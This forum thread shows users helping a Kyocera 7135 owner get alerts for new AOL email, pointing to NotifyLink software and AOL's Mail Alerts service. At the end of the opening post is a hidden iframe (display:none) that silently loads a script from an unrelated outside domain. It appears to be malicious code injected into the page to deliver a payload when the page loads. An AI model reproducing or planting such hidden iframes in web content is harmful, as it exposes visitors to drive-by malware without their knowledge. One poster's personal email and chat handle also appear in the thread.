+ Reply to Thread
    I-300 Novice

7135 Automatic AOL E-mail Notification

I tried to find info on this through a search and can't seem to find anything.

I use AOL as my e-mail account. How do I get it to notify me on my 7135 when there is an incoming e-mail? Is there a way it can be configured (possibly by using other programs) so that when I get an e-mail, it gives me a noice that I received an e-mail.

Does any such program exist, or do I have to sign on and look at my e-mails?

Your help will be most appreciated.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Ahmed V. Ismail
    A Smartphone Addict

Re: 7135 Automatic AOL E-mail Notification

Originally posted by PHCismail
    I tried to find info on this through a search and can't seem to find anything.

I use AOL as my e-mail account. How do I get it to notify me on my 7135 when there is an incoming e-mail? Is there a way it can be configured (possibly by using other programs) so that when I get an e-mail, it gives me a noice that I received an e-mail.

Does any such program exist, or do I have to sign on and look at my e-mails?

Your help will be most appreciated.
    Supposedly NotifyLink INTERNET Edition will do this for AOL.
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

I-300 Novice
    Thanks for the info.

I went to the NotifyLink web site and purchased the Desktop edition for the Kyocera 6035, since the 7135 wasn't listed.

Apparently the difference between the Desktop and the Internet editions is that the Desktop will only work if you leave your AOL running on the desktop when you're not in. I am going to try that, as the difference in cost was a one time $49.95 for the purchase of the Desktop ediiton vz. $99.95 for a ONE YEAR license to the Internet edition, which does not require that your connection be on all the time.

In any event, when I went to do the installation. It has you go through and enter your phone address. Unfortunately, they do not support 'vzw3g.com' domain at this time (according to the message that came up on the enrollment screen). It automatically sent an e-mail to the Customer Service Department advising them of the problem.

I will let you know when I get any further feedback.

Thanks for the lead on the software.
    Ahmed V. Ismail
    A Smartphone Addict

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    While signed onto AOL, go to keyword "Mail Alerts". From there, you can have AOL send you an SMS (text) message when you receive any e-mail, or e-mail that passes a particular criteria. Aside from the potential cost of receiving the messages (2 cents/msg for Verizon unless you have a bulk package), the service is free.
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

I-300 Novice
    Thanks for the info, KB...

I went to the AOL site for Mail Alert. From what I can tell, you have to specify the specific e-mail addresses for which you want a message. Is there a way to set it so that you get an alert on ALL your incoming messages?
    Ahmed V. Ismail
    A Smartphone Addict

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    Absolutely! I'm jealous of you if you get so little SPAM on your AOL account that you can consider that When signed in to AOL, go to http://aolmailalert.aol.com.
    -Mike
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)